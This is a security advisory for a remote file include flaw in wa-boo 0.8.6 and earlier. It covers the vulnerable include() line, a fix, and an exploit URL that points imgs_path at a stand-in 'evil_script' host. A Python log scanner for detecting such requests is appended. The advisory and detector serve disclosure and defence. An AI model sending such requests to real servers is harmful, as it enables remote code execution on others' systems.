Exploit for php platform in category web applications
===================================================
wa-boo <= 0.8.6 - Remote File Include Vulnerability
===================================================
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
wa-boo <= 0.8.6 - Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by: Febr?o - febronio[at]linuxmail.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Code /includes/fotools.php:
include($imgs_path . "includes/css.php" );
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$imgs_path is used in the include() without being initialised or validated, so a request parameter of the same name (with register_globals enabled) selects the file that gets included; because PHP's include() also accepts URLs when remote includes are enabled, an attacker-supplied URL makes the server fetch and execute remote code.
Solution:
Add this line to your PHP file, before the include():
$imgs_path = "bla/bla"; // Your root path
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://target/[script_path]/includes/fotools.php?imgs_path=http://evil_script?
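The request shape above is easy to spot in web server logs. The following is an added example (not part of the original advisory) that scans Apache combined-format access log lines for requests to includes/fotools.php whose imgs_path parameter carries a remote URL; it also handles upper-case schemes and single or double percent-encoding. The log lines, IP addresses and paths are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines (Apache combined format): the first three are
# exploitation attempts in plain, encoded and double-encoded form, the last
# is a non-remote value that should not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Jan/2018:10:00:01 +0000] "GET /gallery/includes/fotools.php?imgs_path=http://203.0.113.9/s.txt? HTTP/1.1" 200 512 "-" "curl/7.58"
203.0.113.5 - - [06/Jan/2018:10:00:02 +0000] "GET /gallery/includes/fotools.php?imgs_path=HTTPS%3A%2F%2F203.0.113.9%2Fs.txt%3F HTTP/1.1" 200 512 "-" "curl/7.58"
203.0.113.5 - - [06/Jan/2018:10:00:03 +0000] "GET /gallery/includes/fotools.php?imgs_path=%2568ttp://203.0.113.9/s.txt HTTP/1.1" 200 512 "-" "curl/7.58"
198.51.100.7 - - [06/Jan/2018:10:00:04 +0000] "GET /gallery/includes/fotools.php?imgs_path=../ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Client IP, timestamp and request target from a combined-format line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) ')
# Schemes that would make include() fetch the file from another host.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches %25-style double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_rfi_attempt(target):
    """True when the request targets fotools.php with a remote URL in imgs_path."""
    parts = urlsplit(target)
    if not parts.path.endswith('/includes/fotools.php'):
        return False
    # parse_qs decodes one layer; fully_decode strips any further layers.
    for raw in parse_qs(parts.query, keep_blank_values=True).get('imgs_path', []):
        if REMOTE_SCHEME_RE.match(fully_decode(raw).lstrip()):
            return True
    return False

def find_rfi_attempts(log_text):
    """Return (client_ip, timestamp, request_target) for every matching log line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_rfi_attempt(m.group('target')):
            hits.append((m.group('ip'), m.group('ts'), m.group('target')))
    return hits

if __name__ == '__main__':
    for ip, ts, target in find_rfi_attempts(SAMPLE_LOG):
        print(f'{ts} {ip} RFI attempt: {target}')
```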
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx for: BLaCK KaME RaIDER
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# 0day.today [2018-01-06] #